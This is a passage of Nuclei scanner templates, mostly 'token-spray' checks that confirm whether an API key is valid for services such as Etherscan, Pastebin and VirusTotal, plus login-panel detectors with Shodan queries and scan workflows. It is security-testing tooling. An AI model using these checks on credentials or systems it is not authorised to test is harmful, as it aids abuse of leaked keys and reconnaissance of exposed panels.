26 | -------------------------------------------------------------------------------- /api-dribbble.yaml: -------------------------------------------------------------------------------- 1 | id: api-dribbble 2 | 3 | info: 4 | name: Dribbble API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.dribbble.com/v2/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md 10 | tags: token-spray,dribbble 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.dribbble.com/v2/user?access_token={{token}}" 17 | 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /api-ebird.yaml: -------------------------------------------------------------------------------- 1 | id: api-ebird 2 | 3 | info: 4 | name: eBird API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://documenter.getpostman.com/view/664302/S1ENwy59 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/eBird.md 10 | tags: token-spray,ebird 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.ebird.org/v2/data/obs/KZ/recent" 17 | headers: 18 | X-eBirdApiToken: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"speciesCode":' 25 | - '"comName":' 26 | - '"sciName":' 27 | - '"locId":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-etherscan.yaml: -------------------------------------------------------------------------------- 1 | id: api-etherscan 2 | 3 | info: 4 | name: Etherscan API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.etherscan.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md 10 | tags: token-spray,etherscan 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | negative: true 23 | words: 24 | - 'Invalid API Key' 25 | 26 | - type: word 27 | part: body 28 | words: 29 | - '"status":' 30 | - '"message":"OK"' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-europeana.yaml: -------------------------------------------------------------------------------- 1 | id: api-europeana 2 | 3 | info: 4 | name: Europeana API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://pro.europeana.eu/page/search 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md 10 | tags: token-spray,europeana 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - 'success' 23 | - 'apikey' 24 | - 'action' 25 | condition: and -------------------------------------------------------------------------------- /api-festivo.yaml: -------------------------------------------------------------------------------- 1 | id: api-festivo 2 | 3 | info: 4 | name: Festivo API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md 10 | tags: token-spray,festivo 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"id":' 23 | - '"holidays":' 24 | - '"name":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-gofile.yaml: -------------------------------------------------------------------------------- 1 | id: api-gofile 2 | 3 | info: 4 | name: GoFile API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://gofile.io/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/GoFile.md 10 | tags: token-spray,gofile 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.gofile.io/getAccountDetails?token={{token}}&allDetails=true" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"token"' 23 | - '"email"' 24 | - '"rootFolder"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-harvardart.yaml: -------------------------------------------------------------------------------- 1 | id: api-harvardart 2 | 3 | info: 4 | name: Harvard Art Museums API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://github.com/harvardartmuseums/api-docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md 10 | tags: token-spray,harvardart 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"colorid"' 23 | - '"name"' 24 | - '"hex"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-hirak-rates.yaml: -------------------------------------------------------------------------------- 1 | id: api-hirak-rates 2 | 3 | info: 4 | name: Hirak Exchange Rates API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://rates.hirak.site/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Hirak%20Exchange%20Rates.md 10 | tags: token-spray,hirak 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://rates.hirak.site/stat/?token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"token":' 23 | - '"plan":' 24 | - '"hits":' 25 | - '"remain":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-holidayapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-holidayapi 2 | 3 | info: 4 | name: Holiday API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://holidayapi.com/docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Holiday%20API.md 10 | tags: token-spray,holidayapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://holidayapi.com/v1/holidays?pretty&key={{token}}&country=US&year=2020&language=EN" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"holidays":' 23 | - '"name":' 24 | - '"date":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-iconfinder.yaml: -------------------------------------------------------------------------------- 1 | id: api-iconfinder 2 | 3 | info: 4 | name: IconFinder API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.iconfinder.com/reference/overview-1 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md 10 | tags: token-spray,iconfinder 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 17 | Host: api.iconfinder.com 18 | Accept: application/json 19 | Authorization: Bearer {{token}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"icons":' 26 | - '"is_icon_glyph":' 27 | - '"download_url":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-improvmx.yaml: -------------------------------------------------------------------------------- 1 | id: api-improvmx 2 | 3 | info: 4 | name: ImprovMX API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://improvmx.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md 10 | tags: token-spray,improvmx 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.improvmx.com/v3/account HTTP/1.1 17 | Authorization: Basic {{base64(':' + token)}} 18 | Host: api.improvmx.com 19 | 20 | redirects: true 21 | max-redirects: 1 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - '"billing_email":' 27 | - '"cancels_on":' 28 | - '"company_details":' 29 | condition: and 30 | -------------------------------------------------------------------------------- /api-instatus.yaml: -------------------------------------------------------------------------------- 1 | id: api-instatus 2 | 3 | info: 4 | name: Instatus API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://instatus.com/help/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md 10 | tags: token-spray,instatus 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.instatus.com/v1/pages" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":' 25 | - '"subdomain":' 26 | - '"name":' 27 | - '"logoUrl":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-iucn.yaml: -------------------------------------------------------------------------------- 1 | id: api-iucn 2 | 3 | info: 4 | name: IUCN API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - http://apiv3.iucnredlist.org/api/v3/docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md 10 | tags: token-spray,iucn 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - 'taxonid' 23 | - 'scientific_name' 24 | - 'subspecies' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-mailboxvalidator.yaml: -------------------------------------------------------------------------------- 1 | id: api-mailboxvalidator 2 | 3 | info: 4 | name: MailboxValidator API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.mailboxvalidator.com/api-email-free 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/MailboxValidator.md 10 | tags: token-spray,mailboxvalidator 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.mailboxvalidator.com/v1/email/free?email=test@test.com&key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"email_address":"test@test.com"' 23 | - '"error_code":""' 24 | - '"error_message":""' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-malshare.yaml: -------------------------------------------------------------------------------- 1 | id: api-malshare 2 | 3 | info: 4 | name: MalShare API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://malshare.com/doc.php 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md 10 | tags: token-spray,malshare 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"md5":' 23 | - '"sha1":' 24 | condition: and 25 | -------------------------------------------------------------------------------- /api-micro-user-service.yaml: -------------------------------------------------------------------------------- 1 | id: api-micro-user-service 2 | 3 | info: 4 | name: Micro User Service API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://m3o.com/user 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md 10 | tags: token-spray,micro-user-service 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.m3o.com/v1/user/Read HTTP/1.1 17 | Host: api.m3o.com 18 | Content-Type: application/json 19 | Authorization: Bearer {{token}} 20 | Content-Length: 21 21 | 22 | { 23 | "id": "usrid-1" 24 | } 25 | 26 | matchers: 27 | - type: word 28 | part: body 29 | words: 30 | - '"username":' 31 | - '"email":' 32 | - '"created":' 33 | - '"updated":' 34 | condition: and 35 | -------------------------------------------------------------------------------- /api-mojoauth.yaml: -------------------------------------------------------------------------------- 1 | id: api-mojoauth 2 | 3 | info: 4 | name: MojoAuth API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://mojoauth.com/docs/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md 10 | tags: token-spray,mojoauth 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.mojoauth.com/token/jwks HTTP/1.1 17 | Host: api.mojoauth.com 18 | X-API-Key: {{token}} 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - '"keys"' 24 | - '"kty"' 25 | - '"kid"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-myanimelist.yaml: -------------------------------------------------------------------------------- 1 | id: api-myanimelist 2 | 3 | info: 4 | name: MyAnimeList API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://myanimelist.net/apiconfig/references/api/v2 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md 10 | tags: token-spray,myanimelist 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.myanimelist.net/v2/anime?q=one&limit=4" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"data":' 25 | - '"paging":' 26 | - '"next":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-mywot.yaml: -------------------------------------------------------------------------------- 1 | id: api-mywot 2 | 3 | info: 4 | name: My Web of Trust API 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://support.mywot.com/hc/en-us/sections/360004477734-API- 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md 10 | tags: token-spray,weboftrust 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 17 | Host: scorecard.api.mywot.com 18 | x-user-id: {{id}} 19 | x-api-key: {{token}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"target":' 26 | - '"safety":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-nownodes.yaml: -------------------------------------------------------------------------------- 1 | id: api-nownodes 2 | 3 | info: 4 | name: Nownodes API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://nownodes.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md 10 | tags: token-spray,nownodes 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://bsc-blockbook.nownodes.io/api HTTP/1.1 17 | Host: bsc-blockbook.nownodes.io 18 | api-key: {{token}} 19 | Content-Type: application/json 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"coin":' 26 | - '"host":' 27 | - '"version":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-orbintelligence.yaml: -------------------------------------------------------------------------------- 1 | id: api-orbintelligence 2 | 3 | info: 4 | name: ORB Intelligence API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://api.orb-intelligence.com/docs/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ORB%20Intelligence.md 10 | tags: token-spray,orbintelligence 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.orb-intelligence.com/3/fetch/1/?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"entity_type":' 23 | - '"company_status":' 24 | - '"orb_num":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-pastebin.yaml: -------------------------------------------------------------------------------- 1 | id: api-pastebin 2 | 3 | info: 4 | name: Pastebin API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://pastebin.com/doc_api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md 10 | tags: token-spray,pastebin 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://pastebin.com/api/api_post.php HTTP/1.1 17 | Host: pastebin.com 18 | Content-Type: application/x-www-form-urlencoded 19 | Content-Length: 81 20 | 21 | api_dev_key={{token}}&api_paste_code=test&api_option=paste 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - 'https://pastebin.com/' 28 | -------------------------------------------------------------------------------- /api-petfinder.yaml: -------------------------------------------------------------------------------- 1 | id: api-petfinder 2 | 3 | info: 4 | name: Petfinder API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.petfinder.com/developers/v2/docs/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md 10 | tags: token-spray,petfinder 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 17 | Host: api.petfinder.com 18 | Content-Type: application/x-www-form-urlencoded 19 | Content-Length: 81 20 | 21 | grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - '"token_type"' 28 | - '"expires_in"' 29 | - '"access_token"' 30 | condition: and 31 | -------------------------------------------------------------------------------- /api-pinata.yaml: -------------------------------------------------------------------------------- 1 | id: api-pinata 2 | 3 | info: 4 | name: Pinata API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.pinata.cloud/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pinata.md 10 | tags: token-spray,pinata 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1 17 | Host: api.pinata.cloud 18 | pinata_api_key: {{token}} 19 | pinata_secret_api_key: {{secret}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"id"' 26 | - '"ipfs_pin_hash"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-quip.yaml: -------------------------------------------------------------------------------- 1 | id: api-quip 2 | 3 | info: 4 | name: Quip API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://quip.com/dev/automation/documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md 10 | tags: token-spray,quip 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://platform.quip.com/1/users/current HTTP/1.1 17 | Host: platform.quip.com 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":' 25 | - '"name":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-rijksmuseum.yaml: -------------------------------------------------------------------------------- 1 | id: api-rijksmuseum 2 | 3 | info: 4 | name: Rijksmuseum API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://data.rijksmuseum.nl/user-generated-content/api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md 10 | tags: token-spray,rijksmuseum 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"count":' 23 | - '"userSets":' 24 | - '"user":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-scanii.yaml: -------------------------------------------------------------------------------- 1 | id: api-scanii 2 | 3 | info: 4 | name: Scanii API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.scanii.com/v2.1/resources.html 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md 10 | tags: token-spray,scanii 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.scanii.com/v2.1/ping HTTP/1.1 17 | Authorization: Basic {{base64(api + ':' + secret)}} 18 | Host: api.scanii.com 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"key"' 25 | - '"message" : "pong"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-smartsheet.yaml: -------------------------------------------------------------------------------- 1 | id: api-smartsheet 2 | 3 | info: 4 | name: Smartsheet API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://smartsheet.redoc.ly/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Smartsheet.md 10 | tags: token-spray,smartsheet 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.smartsheet.com/2.0/home?include=source" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers-condition: and 21 | matchers: 22 | - type: status 23 | status: 24 | - 200 25 | 26 | - type: word 27 | part: body 28 | words: 29 | - '"sheets":' 30 | - '"folders":' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-stytch.yaml: -------------------------------------------------------------------------------- 1 | id: api-stytch 2 | 3 | info: 4 | name: Stytch API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://stytch.com/docs/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md 10 | tags: token-spray,stytch 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://test.stytch.com/v1/users HTTP/1.1 17 | Authorization: Basic {{base64(id + ':' + secret)}} 18 | Host: test.stytch.com 19 | Content-Type: application/json 20 | 21 | {"email": "test@stytch.com"} 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - '"status_code":' 28 | - '"request_id":' 29 | - '"user_id":' 30 | condition: and -------------------------------------------------------------------------------- /api-thecatapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-thecatapi 2 | 3 | info: 4 | name: TheCatApi API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.thecatapi.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md 10 | tags: token-spray,thecatapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.thecatapi.com/v1/votes" 17 | headers: 18 | x-api-key: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"country_code":' 25 | - '"created_at":' 26 | condition: and -------------------------------------------------------------------------------- /api-thedogapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-thedogapi 2 | 3 | info: 4 | name: TheDogApi API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.thedogapi.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md 10 | tags: token-spray,thedogapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.thedogapi.com/v1/votes" 17 | headers: 18 | x-api-key: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - 'id":' 25 | - 'image_id":' 26 | - 'sub_id":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-trello.yaml: -------------------------------------------------------------------------------- 1 | id: api-trello 2 | 3 | info: 4 | name: Trello API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.trello.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Trello.md 10 | tags: token-spray,trello 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.trello.com/1/members/me?key={{key}}&token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | negative: true 22 | words: 23 | - 'invalid key' 24 | -------------------------------------------------------------------------------- /api-urlscan.yaml: -------------------------------------------------------------------------------- 1 | id: api-urlscan 2 | 3 | info: 4 | name: URLScan API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://urlscan.io/docs/api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md 10 | tags: token-spray,urlscan 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://urlscan.io/user/quotas/ HTTP/1.1 17 | Host: urlscan.io 18 | Content-Type: application/json 19 | API-Key: {{token}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - 'X-Rate-Limit-Scope:' 26 | - 'X-Rate-Limit-Limit:' 27 | - 'X-Rate-Limit-Remaining:' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-virustotal.yaml: -------------------------------------------------------------------------------- 1 | id: api-virustotal 2 | 3 | info: 4 | name: VirusTotal API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.virustotal.com/reference 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md 10 | tags: token-spray,virustotal 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 17 | Host: www.virustotal.com 18 | Content-Type: application/x-www-form-urlencoded 19 | Content-Length: 86 20 | 21 | apikey={{token}}&url=google.com 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - "'verbose_msg':" 28 | - "'scan_date':" 29 | - "'permalink':" 30 | condition: and 31 | -------------------------------------------------------------------------------- /api-web3storage.yaml: -------------------------------------------------------------------------------- 1 | id: api-web3storage 2 | 3 | info: 4 | name: Web3 Storage API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.web3.storage/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Web3%20Storage.md 10 | tags: token-spray,web3storage 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.web3.storage/user/uploads HTTP/1.1 17 | Host: api.web3.storage 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"created"' 25 | - '"cid"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /apisix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: apisix-workflow 2 | 3 | info: 4 | name: Apache Apisix Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Apisix related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/apache/apache-apisix-panel.yaml 10 | subtemplates: 11 | - tags: apisix -------------------------------------------------------------------------------- /argocd-login.yaml: -------------------------------------------------------------------------------- 1 | id: argocd-detect 2 | 3 | info: 4 | name: Argo CD Login Panel 5 | author: Adam Crosser,daffainfo 6 | severity: info 7 | description: An Argo CD login panel was discovered. 8 | reference: 9 | - https://argoproj.github.io/cd/ 10 | classification: 11 | cwe-id: CWE-200 12 | metadata: 13 | shodan-query: http.title:"Argo CD" 14 | tags: panel,argocd,login,kubernetes 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/login" 20 | 21 | matchers-condition: and 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - 'Argo CD' 27 | 28 | - type: status 29 | status: 30 | - 200 31 | 32 | # Enhanced by mp on 2022/03/20 33 | -------------------------------------------------------------------------------- /artifactory-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: artifactory-workflow 2 | 3 | info: 4 | name: Artifactory Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Artifactory related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: artifactory 12 | subtemplates: 13 | - tags: artifactory 14 | -------------------------------------------------------------------------------- /avantfax-panel.yaml: -------------------------------------------------------------------------------- 1 | id: avantfax-panel 2 | 3 | info: 4 | name: AvantFAX Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | description: An AvantFAX login panel was discovered. 8 | reference: 9 | - http://www.avantfax.com/ 10 | classification: 11 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 12 | cvss-score: 5.3 13 | cwe-id: CWE-200 14 | metadata: 15 | shodan-query: http.title:"AvantFAX - Login" 16 | tags: panel,avantfax,login 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: word 26 | part: body 27 | words: 28 | - "- AvantFAX - Login" 29 | 30 | - type: status 31 | status: 32 | - 200 33 | 34 | extractors: 35 | - type: regex 36 | part: body 37 | group: 1 38 | regex: 39 | - '

([0-9.]+)<\/p>' 40 | 41 | # Enhanced by mp on 2022/03/20 42 | -------------------------------------------------------------------------------- /avantfax-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: avantfax-workflow 2 | 3 | info: 4 | name: AvantFAX Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all AvantFAX Pipeline related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/avantfax-panel.yaml 10 | subtemplates: 11 | - tags: avantfax 12 | -------------------------------------------------------------------------------- /aviatrix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: aviatrix-workflow 2 | 3 | info: 4 | name: Aviatrix Controller Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Aviatrix Controller related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/aviatrix-panel.yaml 10 | subtemplates: 11 | - tags: aviatrix 12 | -------------------------------------------------------------------------------- /axigen-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: axigen-workflow 2 | 3 | info: 4 | name: Axigen Webmail Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Axigen Webmail related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/axigen-webmail.yaml 10 | subtemplates: 11 | - tags: axigen -------------------------------------------------------------------------------- /b2evolution-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: b2evolution-workflow 2 | 3 | info: 4 | name: b2evolution CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all b2evolution CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: b2evolution 12 | subtemplates: 13 | - tags: b2evolution -------------------------------------------------------------------------------- /bedita-panel.yaml: -------------------------------------------------------------------------------- 1 | id: bedita-panel 2 | 3 | info: 4 | name: 